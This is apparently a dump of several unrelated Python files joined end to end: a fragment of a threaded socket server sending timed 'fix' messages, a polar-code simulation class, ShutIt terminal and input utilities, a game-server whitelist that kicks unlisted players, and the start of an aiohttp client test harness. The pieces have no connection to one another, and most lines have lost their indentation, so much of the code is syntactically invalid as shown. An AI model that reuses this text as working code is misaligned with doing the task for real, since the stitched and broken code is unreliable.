fix = "Fix:" + str(line) + ";TTL:" + str(int(valid_period)) + ";Start_Time:" + str(javaTimer()) + "###"
sr.send(fix.encode())
sleep(gap_btw_fixes)
# after sending the fixes, send "end" and close the server
print(id, "server closing", javaTimer())
sr.send("end".encode())
sr.close()
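# Receiver-side parsing sketch for the message format assembled above (hypothetical code;
# the middle server is not part of this file). Messages are "###"-delimited, so a consumer
# might do something like:
#
#   data = conn.recv(4096).decode()
#   for packet in data.split("###"):
#       if not packet.strip() or packet.strip() == "end":
#           continue
#       fields = dict(part.split(":", 1) for part in packet.split(";"))
#       fix, ttl, start = fields["Fix"], int(fields["TTL"]), int(fields["Start_Time"])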
# create different threads for each supplier
t = [None]*num_servers
for _ in range(num_servers):
t[_] = Thread(target=create_server, args=(_,))
t[_].start()
# wait for all servers to end
for _ in range(num_servers):
t[_].join()
PolarCode.py
#!/usr/bin/env python
"""
An object that encapsulates all of the parameters required to define a polar code.
This object must be given to the following classes: `AWGN`, `Construct`, `Decode`, `Encode`, `GUI`, `Shorten`.
"""
import numpy as np
from polarcodes.utils import *
from polarcodes.Construct import Construct
from polarcodes.Shorten import Shorten
from polarcodes.Encode import Encode
from polarcodes.Decode import Decode
from polarcodes.AWGN import AWGN
import json
import matplotlib.pyplot as plt
import threading
import tkinter as tk
class PolarCode:
"""
Attributes
----------
N: int
the mothercode block length
M: int
the block length (after puncturing)
K: int
the code dimension
n: int
number of bits per index
s: int
number of shortened bit-channels
reliabilities: ndarray<int>
reliability vector (least reliable to most reliable)
frozen: ndarray<int>
the frozen bit indices
frozen_lookup: ndarray<int>
lookup table for the frozen bits
x: ndarray<int>
the uncoded message with frozen bits
construction_type: string
the mothercode construction type
message_received: ndarray<int>
the decoded message received from a channel
punct_flag: bool
whether or not the code is punctured
simulated_snr: ndarray<float>
the SNR values simulated
simulated_fer: ndarray<float>
the FER values for the SNR values in ``simulated_snr`` using `simulate`
simulated_ber: ndarray<float>
the BER values for the SNR values in ``simulated_snr`` using `simulate`
punct_type: string
'punct' for puncturing, and 'shorten' for shortening
punct_set: ndarray<int>
the coded punctured indices
punct_set_lookup: ndarray<int>
lookup table for ``punct_set``
source_set: ndarray<int>
the uncoded punctured indices
source_set_lookup: ndarray<int>
lookup table for ``source_set``
punct_algorithm: string
the name of a puncturing algorithm. Options: {'brs', 'wls', 'bgl', 'perm'}
update_frozen_flag: bool
whether or not to update the frozen indices after puncturing
recip_flag: bool
True if ``punct_set`` equals ``source_set``
"""
def __init__(self, M, K, punct_params=('', '', [], [], None,)):
"""
Parameters
----------
M: int
the block length (after puncturing)
K: int
the code dimension
punct_params: tuple
a tuple to completely specify the puncturing parameters (if required).
The syntax is (``punct_type``, ``punct_algorithm``, ``punct_set``, ``source_set``, ``update_frozen_flag``)
"""
self.initialise_code(M, K, punct_params)
self.status_bar = None # set by the GUI so that the simulation progress can be tracked
self.gui_widgets = []
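    # A minimal usage sketch (hypothetical values; relies on the Construct/Encode/AWGN/Decode
    # helpers imported at the top of this module):
    #
    #   myPC = PolarCode(64, 32)                  # block length M=64, code dimension K=32
    #   Construct(myPC, 4.0)                      # mothercode construction at a 4.0 dB design SNR
    #   myPC.set_message(np.random.randint(2, size=myPC.K))
    #   Encode(myPC)
    #   AWGN(myPC, 4.0)                           # as in run_simulation below, the E_b/N_o point is passed directly
    #   Decode(myPC)
    #   print(myPC.message_received)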
def initialise_code(self, M, K, punct_params):
"""
Initialise the code with a set of parameters the same way as the constructor.
Call this any time you want to change the code rate.
"""
# mothercode parameters
self.M = M
self.N = int(2**(np.ceil(np.log2(M))))
self.n = int(np.log2(self.N))
self.F = arikan_gen(self.n)
self.K = K
self.s = self.N - self.M
self.reliabilities = np.array([])
self.frozen = np.array([])
self.frozen_lookup = np.array([])
self.x = np.zeros(self.N, dtype=int)
self.u = np.zeros(self.N, dtype=int)
self.construction_type = 'bb'
self.message_received = np.array([])
self.punct_flag = False if self.M == self.N else True
self.simulated_snr = np.array([])
self.simulated_fer = np.array([])
self.simulated_ber = np.array([])
self.FERestimate = 0
self.T = None
# puncturing parameters
self.punct_type = punct_params[0]
self.punct_set = np.array(punct_params[2])
self.punct_set_lookup = self.get_lut(punct_params[2])
self.source_set = np.array(punct_params[3])
self.source_set_lookup = self.get_lut(punct_params[3])
self.punct_algorithm = punct_params[1]
self.update_frozen_flag = punct_params[4]
self.recip_flag = np.array_equal(np.array(punct_params[2]), np.array(punct_params[3]))
def __str__(self):
"""
A string definition of PolarCode. This allows you to print any PolarCode object and see all of its
relevant parameters.
Returns
----------
string
a stringified version of PolarCode
"""
output = '=' * 10 + " Polar Code " + '=' * 10 + '\n'
output += "N: " + str(self.N) + '\n'
output += "M: " + str(self.M) + '\n'
output += "K: "+ str(self.K) + '\n'
output += "Mothercode Construction: " + self.construction_type + '\n'
output += "Ordered Bits (least reliable to most reliable): " + str(self.reliabilities) + '\n'
output += "Frozen Bits: " + str(self.frozen) + '\n'
output += "Puncturing Flag: " + str(self.punct_flag) + '\n'
output += "Puncturing Parameters: {punct_type: " + str(self.punct_type) + '\n'
output += " punct_algorithm: " + str(self.punct_algorithm) + '\n'
output += " punct_set: " + str(self.punct_set) + '\n'
output += " source_set: " + str(self.source_set) + '\n'
output += " update_frozen_flag: " + str(self.update_frozen_flag) + "}" + '\n'
return output
def set_message(self, m):
"""
        Write the message vector into the non-frozen positions of ``x``; the positions listed in ``frozen`` stay zero.
Parameters
----------
m: ndarray<int>
the message vector
"""
self.message = m
self.x[self.frozen_lookup == 1] = m
self.u = self.x.copy()
def get_codeword(self):
"""
Get the codeword that was last encoded in this `PolarCode` object. Note that this codeword is not always
the same as `myPC.u`, since punctured bits are simply set to zero in this variable as if they were
frozen bits, and then decoded using the corresponding puncturing table likelihoods.
Returns
-------
ndarray<float>
the codeword for the last encoded message using `myPC.u`, or None.
"""
if self.punct_flag == False:
return self.u
else:
return self.u[np.where(self.source_set_lookup == 1)]
def get_normalised_SNR(self, design_SNR):
"""
Normalise E_b/N_o so that the message bits have the same energy for any code rate.
Parameters
----------
design_SNR: float
E_b/N_o in decibels
Returns
----------
float
normalised E_b/N_o in linear units
"""
Eb_No_dB = design_SNR
Eb_No = 10 ** (Eb_No_dB / 10) # convert dB scale to linear
Eb_No = Eb_No * (self.K / self.M) # normalised message signal energy by R=K/M (M=N if not punctured)
return Eb_No
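    # Worked example of the normalisation above: for design_SNR = 3 dB and a rate K/M = 0.5 code,
    # 10**(3/10) ~= 1.995, so the normalised E_b/N_o is ~1.995 * 0.5 ~= 0.998 (linear units).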
def get_lut(self, my_set):
"""
Convert a set into a lookup table.
Parameters
----------
my_set: ndarray<int>
a vector of indices
Returns
----------
ndarray<int>
a LUT with "0" for an index in ``my_set``, else "1"
"""
my_lut = np.ones(self.N, dtype=int)
my_lut[my_set] = 0
return my_lut
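    # Worked example: with N = 8 and my_set = [0, 2], the lookup table returned above is
    # [0, 1, 0, 1, 1, 1, 1, 1].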
def save_as_json(self, sim_filename):
"""
Save all the important parameters in this object as a JSON file.
Parameters
----------
sim_filename: string
directory and filename to save JSON file to (excluding extension)
"""
data = {
'N': self.M,
'n': self.n,
'K': self.K,
'frozen': self.frozen.tolist(),
'construction_type': self.construction_type,
'punct_flag': self.punct_flag,
'punct_type': self.punct_type,
'punct_set': self.punct_set.tolist(),
'source_set': self.source_set.tolist(),
'punct_algorithm': self.punct_algorithm,
'update_frozen_flag': self.update_frozen_flag,
'BER': self.simulated_ber.tolist(),
'FER': self.simulated_fer.tolist(),
'SNR': self.simulated_snr.tolist()
}
with open(sim_filename + '.json', 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=4)
def run_simulation(self, Eb_No, max_iter, min_errors, min_iters):
frame_error_count = 0
bit_error_count = 0
num_blocks = 0
for i in range(1, max_iter + 1):
# simulate random PC in an AWGN channel
self.set_message(np.random.randint(2, size=self.K))
Encode(self)
AWGN(self, Eb_No)
Decode(self)
# detect errors
error_vec = self.message ^ self.message_received
num_errors = sum(error_vec)
            frame_error_count = frame_error_count + (num_errors > 0)  # any bit error makes the frame erroneous
bit_error_count = bit_error_count + num_errors
# early stopping condition
num_blocks = i
if frame_error_count >= min_errors and i >= min_iters:
break
return frame_error_count, bit_error_count, num_blocks
def simulate(self, save_to, Eb_No_vec, design_SNR=None, max_iter=100000, min_iterations=1000, min_errors=30, sim_seed=1729, manual_const_flag=True):
"""
        Monte-Carlo simulation of the performance of this polar code.
        The sweep over E_b/N_o values stops early once an E_b/N_o point produces fewer than ``min_errors`` frame errors.
        Within each E_b/N_o point, the simulation also stops early once at least ``min_iterations`` frames have been sent
        and at least ``min_errors`` frame errors have been counted. The results are saved in a JSON file using :func:`save_as_json`.
Parameters
----------
save_to: string
directory and filename to save JSON file to (excluding extension)
Eb_No_vec: ndarray<float>
the range of SNR values to simulate
design_SNR: float
the construction design SNR, E_b/N_o
max_iter: int
maximum number of iterations per SNR
min_iterations: int
the minimum number of iterations before early stopping is allowed per SNR
min_errors: int
the minimum number of frame errors before early stopping is allowed per SNR
sim_seed: int
pseudo-random generator seed, default is 1729 ('twister' on MATLAB)
manual_const_flag: bool
a flag that decides if construction should be done before simulating.
Set to False if mothercode and/or puncturing constructions are manually set by the user.
"""
# initialise simulation
np.random.seed(sim_seed)
frame_error_rates = np.zeros(len(Eb_No_vec))
bit_error_rates = np.zeros(len(Eb_No_vec))
# do construction if not done already
if not manual_const_flag:
if self.punct_flag and self.punct_type == 'shorten':
Shorten(self, design_SNR)
else:
Construct(self, design_SNR)
print(self)
print('=' * 10, "Simulation", '=' * 10)
for i in range(len(Eb_No_vec)):
# run simulation for the current SNR
frame_error_count, bit_error_count, num_blocks = self.run_simulation(Eb_No_vec[i], max_iter, min_errors, min_iterations)
# calculate FER and BER
frame_error_rate = frame_error_count / num_blocks
bit_error_rate = bit_error_count / (self.K * num_blocks)
frame_error_rates[i] = frame_error_rate
bit_error_rates[i] = bit_error_rate
print("Eb/No:", round(Eb_No_vec[i], 5), " FER:", round(frame_error_rate, 3), " BER:", round(bit_error_rate, 5))
print('# Iterations:', num_blocks, ' # Frame Errors:', frame_error_count, ' # Bit Errors:', bit_error_count)
print('='*20)
# update GUI (if used)
            if self.status_bar is not None:
self.status_bar.set("Simulation progress: " + str(i + 1) + "/" + str(len(Eb_No_vec)))
# early stopping condition
if frame_error_count < min_errors:
break
# write data to JSON file
self.simulated_snr = Eb_No_vec
self.simulated_ber = bit_error_rates
self.simulated_fer = frame_error_rates
self.save_as_json(save_to)
# update GUI construction fields (if used)
        if self.status_bar is not None:
self.gui_widgets[3].delete("1.0", tk.END)
self.gui_widgets[6].delete("1.0", tk.END)
self.gui_widgets[3].insert(tk.INSERT, ",".join(map(str, self.frozen)))
self.gui_widgets[6].insert(tk.INSERT, ",".join(map(str, self.punct_set)))
# update console and GUI
print("Successfully completed simulation.\n")
        if self.status_bar is not None:
self.status_bar.set("Simulation progress: Done.")
def plot_helper(self, new_plot, sim_filenames, dir, plot_title = 'Polar Code Performance'):
# plot the FER and BER from file list
new_plot.cla()
for sim_filename in sim_filenames:
with open(dir + sim_filename + '.json') as data_file:
data_loaded = json.load(data_file)
new_plot.plot(data_loaded['SNR'], data_loaded['FER'], '-o', markersize=6, linewidth=3, label=sim_filename)
# format the plots
new_plot.set_title(plot_title)
new_plot.set_ylabel("Frame Error Rate")
new_plot.set_xlabel("$E_b/N_o$ (dB)")
new_plot.grid(linestyle='-')
new_plot.set_yscale('log')
new_plot.legend(loc='lower left')
# call this for manual plotting
def plot(self, sim_filenames, dir):
"""
Plot multiple sets of FER data from the same directory on the same axes.
Parameters
----------
sim_filenames: ndarray<string>
a list of all filenames to plot in a common root directory
dir: string
the root directory for the specified filenames
"""
fig = plt.figure()
new_plot = fig.add_subplot(111)
self.plot_helper(new_plot, sim_filenames, dir)
fig.show()
# used by the GUI class for automated plotting
def gui_plot_handler(self, gui_dict, fig):
sim_filenames = gui_dict['filenames']
dir = gui_dict['file_dir']
self.plot_helper(fig, sim_filenames, dir)
# used by the GUI class for simulating a new code
def gui_sim_handler(self, gui_dict):
# updated Polar Code from user
        punct_type = 'shorten' if gui_dict['punct_type'] else 'punct'
shortening_params = (punct_type, gui_dict['punct_algo'], np.array(gui_dict['shortened_set'], dtype=int),
np.array(gui_dict['shortened_set'], dtype=int), False)
self.initialise_code(gui_dict['N'], gui_dict['K'], shortening_params)
self.construction_type = gui_dict['construction_algo']
self.frozen = gui_dict['frozen_set']
# simulation parameters from user
iterations = gui_dict['iterations']
min_frame_errors = gui_dict['min_frame_errors']
file_dir = gui_dict['file_dir']
save_to = gui_dict['save_to']
manual_const_flag = gui_dict['manual_const_flag']
design_SNR = gui_dict['design_SNR']
Eb_No_vec = gui_dict['snr_values']
# run simulation in another thread to avoid GUI freeze
th = threading.Thread(name='sim_thread', target=self.simulate, args=(save_to, Eb_No_vec, design_SNR, iterations, 1000, min_frame_errors, 1729, manual_const_flag,))
        th.daemon = True
th.start()
|
shutit_util.py
|
#!/usr/bin/env python
"""ShutIt utility functions.
"""
# The MIT License (MIT)
#
# Copyright (C) 2014 OpenBet Limited
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import print_function
import binascii
import getpass
import logging
import os
import random
import re
import readline
import signal
import socket
import stat
import string
import sys
import threading
import time
import traceback
import shutit_assets
import shutit_class
import shutit_global
import shutit
if shutit_global.shutit_global_object.ispy3:
from builtins import input
else:
input=raw_input
def is_file_secure(file_name):
"""Returns false if file is considered insecure, true if secure.
If file doesn't exist, it's considered secure!
"""
if not os.path.isfile(file_name):
return True
file_mode = os.stat(file_name).st_mode
if file_mode & (stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH):
return False
return True
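# Example: a file with mode 0o600 (rw-------) is reported as secure, whereas a file
# with mode 0o644 (rw-r--r--) is not, because the group/other read bits are set.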
def colorise(code, msg):
"""Colorize the given string for a terminal.
See https://misc.flogisoft.com/bash/tip_colors_and_formatting
"""
return '\033[%sm%s\033[0m' % (code, msg) if code else msg
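# Example: colorise(31, 'error') wraps the message in the ANSI escape codes for red,
# while colorise('', 'plain') returns the message unchanged.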
def emblinken(msg):
"""Blink the message for a terminal
"""
return '\033[5m%s\033[0m' % msg
def random_id(size=8, chars=string.ascii_letters + string.digits):
"""Generates a random string of given size from the given chars.
@param size: The size of the random string.
@param chars: Constituent pool of characters to draw random characters from.
@type size: number
@type chars: string
@rtype: string
@return: The string of random characters.
"""
return ''.join(random.choice(chars) for _ in range(size))
def random_word(size=6):
"""Returns a random word in lower case.
"""
words = shutit_assets.get_words().splitlines()
word = ''
while len(word) != size or "'" in word:
word = words[int(random.random() * (len(words) - 1))]
return word.lower()
def get_hash(string_to_hash):
"""Helper function to get preceding integer
eg com.openbet == 1003189494
>>> import binascii
>>> abs(binascii.crc32(b'shutit.tk'))
782914092
Recommended means of determining run order integer part.
"""
return abs(binascii.crc32(string_to_hash.encode()))
# get the ordinal for a given char, in a friendly way
def get_wide_hex(char):
if len(char) != 2:
return r'\x' + hex(ord(char))[2:]
return r'\u' + hex(0x10000 + (ord(char[0]) - 0xD800) * 0x400 + (ord(char[1]) - 0xDC00))[2:]
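# Example: for a two-character UTF-16 surrogate pair such as '\ud83d\ude00' (U+1F600),
# the arithmetic above recombines the pair into r'\u1f600'; a single character such as
# 'a' simply becomes r'\x61'.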
# CTRL-\ HANDLING CODE STARTS
def ctrl_quit_signal_handler(_,frame):
    shutit_global.shutit_global_object.shutit_print(r'CTRL-\ caught, hard-exiting ShutIt')
shutit_frame = get_shutit_frame(frame)
if shutit_frame:
shutit_class.do_finalize()
shutit_global.shutit_global_object.handle_exit(exit_code=1)
# CTRL-\ HANDLING CODE ENDS
# CTRL-C HANDLING CODE STARTS
in_ctrlc = False
def ctrlc_background():
global ctrl_c_calls
global in_ctrlc
ctrl_c_calls += 1
if ctrl_c_calls > 10:
shutit_global.shutit_global_object.handle_exit(exit_code=1)
in_ctrlc = True
time.sleep(1)
in_ctrlc = False
def ctrl_c_signal_handler(_, frame):
"""CTRL-c signal handler - enters a pause point if it can.
"""
global ctrl_c_calls
ctrl_c_calls += 1
if ctrl_c_calls > 10:
shutit_global.shutit_global_object.handle_exit(exit_code=1)
shutit_frame = get_shutit_frame(frame)
if in_ctrlc:
msg = 'CTRL-C hit twice, quitting'
if shutit_frame:
shutit_global.shutit_global_object.shutit_print('\n')
shutit = shutit_frame.f_locals['shutit']
shutit.log(msg,level=logging.CRITICAL)
else:
shutit_global.shutit_global_object.shutit_print(msg)
shutit_global.shutit_global_object.handle_exit(exit_code=1)
if shutit_frame:
shutit = shutit_frame.f_locals['shutit']
if shutit.build['ctrlc_passthrough']:
            shutit.get_current_shutit_pexpect_session().pexpect_child.sendline(r'')
return
shutit_global.shutit_global_object.shutit_print(colorise(31,"\r" + r"You may need to wait for a command to complete before a pause point is available. Alternatively, CTRL-\ to quit."))
shutit.build['ctrlc_stop'] = True
t = threading.Thread(target=ctrlc_background)
t.daemon = True
t.start()
# Reset the ctrl-c calls
ctrl_c_calls = 0
return
shutit_global.shutit_global_object.shutit_print(colorise(31,'\n' + '*' * 80))
shutit_global.shutit_global_object.shutit_print(colorise(31,"CTRL-c caught, CTRL-c twice to quit."))
shutit_global.shutit_global_object.shutit_print(colorise(31,'*' * 80))
t = threading.Thread(target=ctrlc_background)
t.daemon = True
t.start()
# Reset the ctrl-c calls
ctrl_c_calls = 0
def get_shutit_frame(frame):
global ctrl_c_calls
ctrl_c_calls += 1
if ctrl_c_calls > 10:
shutit_global.shutit_global_object.handle_exit(exit_code=1)
if not frame.f_back:
return None
else:
if 'shutit' in frame.f_locals:
return frame
return get_shutit_frame(frame.f_back)
ctrl_c_calls = 0
# CTRL-C HANDLING CODE ENDS
def print_frame_recurse(frame):
if frame.f_back:
shutit_global.shutit_global_object.shutit_print('=' * 77)
shutit_global.shutit_global_object.shutit_print(frame.f_locals)
print_frame_recurse(frame.f_back)
def check_regexp(regex):
if regex is None:
# Is this ok?
return True
try:
re.compile(regex)
return True
except re.error:
return False
def sendline(child, line):
"""Handles sending of line to pexpect object.
"""
child.sendline(line)
def sanitize_terminal():
os.system('stty sane')
def exit_cleanup():
time.sleep(1)
sys.stdout.write('ShutIt has exited, resetting terminal in 2...')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\rShutIt has exited, resetting terminal in 1...')
sys.stdout.flush()
time.sleep(1)
os.system('reset')
def util_raw_input(prompt='', default=None, ispass=False, use_readline=True):
"""Handles raw_input calls, and switches off interactivity if there is apparently
no controlling terminal (or there are any other problems)
"""
if use_readline:
try:
readline.read_init_file('/etc/inputrc')
except IOError:
pass
readline.parse_and_bind('tab: complete')
prompt = '\r\n' + prompt
if ispass:
prompt += '\r\nInput Secret: '
sanitize_terminal()
if shutit_global.shutit_global_object.interactive == 0:
return default
    ## See: https://github.com/ianmiell/shutit/issues/299 - python3 made input == python 2's raw_input
#if not shutit_global.shutit_global_object.ispy3:
# input = raw_input
#try:
# input
#except NameError:
# shutit_global.shutit_global_object.shutit_print('input not available, printing debug')
# print_debug()
# sys.exit(1)
if not shutit_global.shutit_global_object.determine_interactive():
return default
while True:
try:
if ispass:
return getpass.getpass(prompt=prompt)
else:
return input(prompt).strip() or default
except KeyboardInterrupt:
continue
        except IOError:
            msg = 'Problems getting raw input, assuming no controlling terminal.'
            shutit_global.shutit_global_object.set_noninteractive(msg=msg)
            return default
def get_input(msg, default='', valid=None, boolean=False, ispass=False, color=None):
"""Gets input from the user, and returns the answer.
@param msg: message to send to user
@param default: default value if nothing entered
    @param valid: valid input values (default None means any input is allowed)
@param boolean: whether return value should be boolean
@param ispass: True if this is a password (ie whether to not echo input)
@param color: Color code to colorize with (eg 32 = green)
"""
# switch off log tracing when in get_input
log_trace_when_idle_original_value = shutit_global.shutit_global_object.log_trace_when_idle
shutit_global.shutit_global_object.log_trace_when_idle = False
if boolean and valid is None:
valid = ('yes','y','Y','1','true','no','n','N','0','false')
if color:
answer = util_raw_input(prompt=colorise(color,msg),ispass=ispass)
else:
answer = util_raw_input(msg,ispass=ispass)
if boolean and answer in ('', None) and default != '':
# Revert log trace value to original
shutit_global.shutit_global_object.log_trace_when_idle = log_trace_when_idle_original_value
return default
if valid is not None:
while answer not in valid:
shutit_global.shutit_global_object.shutit_print('Answer must be one of: ' + str(valid),transient=True)
if color:
answer = util_raw_input(prompt=colorise(color,msg),ispass=ispass)
else:
answer = util_raw_input(msg,ispass=ispass)
if boolean:
if answer.lower() in ('yes','y','1','true','t'):
# Revert log trace value to original
shutit_global.shutit_global_object.log_trace_when_idle = log_trace_when_idle_original_value
return True
elif answer.lower() in ('no','n','0','false','f'):
# Revert log trace value to original
shutit_global.shutit_global_object.log_trace_when_idle = log_trace_when_idle_original_value
return False
# Revert log trace value to original
shutit_global.shutit_global_object.log_trace_when_idle = log_trace_when_idle_original_value
return answer or default
def print_debug(exc_info=None, msg=''):
if msg:
shutit_global.shutit_global_object.shutit_print('Message: ' + msg)
environ_string = ''
for env in os.environ:
environ_string += 'export ' + env + '=' + str(os.environ[env]) + ';'
shutit_global.shutit_global_object.shutit_print('\n=============================== DEBUG INFO =========================================')
shutit_global.shutit_global_object.shutit_print('This file: ' + os.path.dirname(os.path.realpath(__file__)))
shutit_global.shutit_global_object.shutit_print('Python version: ' + 'sys.version_info: ' + str(sys.version_info) + ', sys.version: ' + str(sys.version))
shutit_global.shutit_global_object.shutit_print('Shutit version: ' + shutit.shutit_version)
shutit_global.shutit_global_object.shutit_print('Server: ' + socket.gethostname())
shutit_global.shutit_global_object.shutit_print('Environment: ' + environ_string)
shutit_global.shutit_global_object.shutit_print('Command was: ' + sys.executable + (' ').join(sys.argv))
shutit_global.shutit_global_object.shutit_print('ShutIt global state: ' + str(shutit_global.shutit_global_object))
if exc_info:
stack_trace = ''
for line in traceback.format_exception(*exc_info):
stack_trace += line
shutit_global.shutit_global_object.shutit_print('Stacktrace:\n' + stack_trace)
shutit_global.shutit_global_object.shutit_print('\n=============================== DEBUG INFO =========================================')
|
rconwhitelist.py
|
import sys, os, sched, logging, threading, time, json
import lib.rconprotocol
from lib.rconprotocol import Player
class RconWhitelist(object):
    Interval = 30  # how often whitelist.json should be saved, in seconds (default: every 30 seconds)
def __init__(self, rcon, configFile, GUI=False):
self.configFile = configFile
self.rcon = rcon
self.whitelist = []
self.changed = False
self.modified = None
self.GUI = GUI
if not(os.path.isfile(self.configFile)):
open(self.configFile, 'a').close()
logging.info("[WHITELIST] Loading whitelist...")
self.loadConfig()
if self.GUI: return
# thread to save whitelist.json every X
self.saveConfigAsync()
# thread to watch for file changes
t = threading.Thread(target=self.watchConfig)
t.daemon = True
t.start()
"""
    public: (Re)Load the whitelist configuration file
"""
def loadConfig(self):
with open(self.configFile) as json_config:
try:
config = json.load(json_config)
except ValueError:
config = []
self.whitelist = []
for x in config:
self.whitelist.append( Player.fromJSON(x) )
self.modified = os.path.getmtime(self.configFile)
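    # Assumed layout of whitelist.json: a JSON array of serialised Player objects,
    # e.g. [{"name": "...", "guid": "...", ...}]; the exact fields are defined by
    # lib.rconprotocol.Player and are written back by saveConfig() below.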
def watchConfig(self):
if not(os.path.isfile(self.configFile)): return
time.sleep(10)
mtime = os.path.getmtime(self.configFile)
if self.modified != mtime:
self.loadConfig()
self.fetchPlayers()
self.watchConfig()
def saveConfigAsync(self):
t = threading.Thread(target=self.saveConfig)
t.daemon = True
t.start()
def saveConfig(self):
if self.changed or self.GUI:
with open(self.configFile, 'w') as outfile:
json.dump([ob.__dict__ for ob in self.whitelist], outfile, indent=4, sort_keys=True)
if self.GUI: return
self.changed = False
time.sleep(self.Interval)
self.saveConfig()
def fetchPlayers(self):
self.rcon.sendCommand('players')
def checkPlayer(self, player):
if player.allowed:
logging.info('[WHITELIST] Player %s with ID %s IS WHITELISTED' % (player.name, player.guid))
return
logging.info('[WHITELIST] Player %s IS NOT WHITELISTED - Kick in progress' % (player.name))
self.rcon.sendCommand('kick {}'.format(player.number))
def OnPlayers(self, playerList):
for x in playerList:
found = [a for a in self.whitelist if a.guid == x.guid]
if len(found) <= 0: break
self.checkPlayer(found[0])
def OnPlayerConnect(self, player):
found = [x for x in self.whitelist if x.guid == player.guid]
# add the connecting player into the whitelist
if len(found) <= 0:
self.whitelist.append(player)
self.changed = True
found.append( player )
self.checkPlayer(found[0])
|
test_client_functional_oldstyle.py
|
"""HTTP client functional tests."""
import asyncio
import binascii
import cgi
import contextlib
import email.parser
import gc
import http.server
import io
import json
import logging
import os
import os.path
import re
import ssl
import sys
import threading
import traceback
import unittest
import urllib.parse
from http.cookies import SimpleCookie
from unittest import mock
from multidict import MultiDict
import aiohttp
import aiohttp.http
from aiohttp import client, helpers, test_utils, web
from aiohttp.multipart import MultipartWriter
from aiohttp.test_utils import run_briefly, unused_port
@contextlib.contextmanager
def run_server(loop, *, listen_addr=('127.0.0.1', 0),
use_ssl=False, router=None):
properties = {}
transports = []
class HttpRequestHandler:
def __init__(self, addr):
host, port = addr
self.host = host
self.port = port
self.address = addr
self._url = '{}://{}:{}'.format(
'https' if use_ssl else 'http', host, port)
def __getitem__(self, key):
return properties[key]
def __setitem__(self, key, value):
properties[key] = value
def url(self, *suffix):
return urllib.parse.urljoin(
self._url, '/'.join(str(s) for s in suffix))
async def handler(request):
if properties.get('close', False):
return
for hdr, val in request.message.headers.items():
if (hdr.upper() == 'EXPECT') and (val == '100-continue'):
request.writer.write(b'HTTP/1.0 100 Continue\r\n\r\n')
break
rob = router(properties, request)
return (await rob.dispatch())
class TestHttpServer(web.RequestHandler):
def connection_made(self, transport):
transports.append(transport)
super().connection_made(transport)
if use_ssl:
here = os.path.join(os.path.dirname(__file__), '..', 'tests')
keyfile = os.path.join(here, 'sample.key')
certfile = os.path.join(here, 'sample.crt')
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.load_cert_chain(certfile, keyfile)
else:
sslcontext = None
def run(loop, fut):
thread_loop = asyncio.new_event_loop()
asyncio.set_event_loop(thread_loop)
host, port = listen_addr
server_coroutine = thread_loop.create_server(
lambda: TestHttpServer(
web.Server(handler, loop=thread_loop), keepalive_timeout=0.5),
host, port, ssl=sslcontext)
server = thread_loop.run_until_complete(server_coroutine)
waiter = thread_loop.create_future()
loop.call_soon_threadsafe(
fut.set_result, (thread_loop, waiter,
server.sockets[0].getsockname()))
try:
thread_loop.run_until_complete(waiter)
finally:
# call pending connection_made if present
run_briefly(thread_loop)
# close opened transports
for tr in transports:
tr.close()
run_briefly(thread_loop) # call close callbacks
server.close()
thread_loop.stop()
thread_loop.close()
gc.collect()
fut = loop.create_future()
server_thread = threading.Thread(target=run, args=(loop, fut))
server_thread.start()
thread_loop, waiter, addr = loop.run_until_complete(fut)
try:
yield HttpRequestHandler(addr)
finally:
thread_loop.call_soon_threadsafe(waiter.set_result, None)
server_thread.join()
class Router:
_response_version = "1.1"
_responses = http.server.BaseHTTPRequestHandler.responses
def __init__(self, props, request):
# headers
self._headers = http.client.HTTPMessage()
for hdr, val in request.message.headers.items():
self._headers.add_header(hdr, val)
self._props = props
self._request = request
self._method = request.message.method
self._uri = request.message.path
self._version = request.message.version
self._compression = request.message.compression
self._body = request.content
url = urllib.parse.urlsplit(self._uri)
self._path = url.path
self._query = url.query
@staticmethod
def define(rmatch):
def wrapper(fn):
f_locals = sys._getframe(1).f_locals
mapping = f_locals.setdefault('_mapping', [])
mapping.append((re.compile(rmatch), fn.__name__))
return fn
return wrapper
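    # How the routing table is built: because the decorator runs while the subclass body
    # is being executed, sys._getframe(1).f_locals is the class namespace, so every method
    # decorated with @Router.define(r'...') registers (compiled_regex, method_name) in the
    # subclass's `_mapping` list, which dispatch() then scans for a match against the path.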
async def dispatch(self): # pragma: no cover
for route, fn in self._mapping:
match = route.match(self._path)
if match is not None:
try:
return (await getattr(self, fn)(match))
except Exception:
out = io.StringIO()
traceback.print_exc(file=out)
return (await self._response(500, out.getvalue()))
return ()
return (await self._response(self._start_response(404)))
def _start_response(self, code):
return web.Response(status=code)
async def _response(self, response, body=None,
headers=None, chunked=False, write_body=None):
r_headers = {}
for key, val in self._headers.items():
key = '-'.join(p.capitalize() for p in key.split('-'))
r_headers[key] = val
encoding = self._headers.get('content-encoding', '').lower()
if 'gzip' in encoding: # pragma: no cover
cmod = 'gzip'
elif 'deflate' in encoding:
cmod = 'deflate'
else:
cmod = ''
resp = {
'method': self._method,
'version': '%s.%s' % self._version,
'path': self._uri,
'headers': r_headers,
'origin': self._request.transport.get_extra_info('addr', ' ')[0],
'query': self._query,
'form': {},
'compression': cmod,
'multipart-data': []
}
if body: # pragma: no cover
resp['content'] = body
else:
resp['content'] = (
await self._request.read()).decode('utf-8', 'ignore')
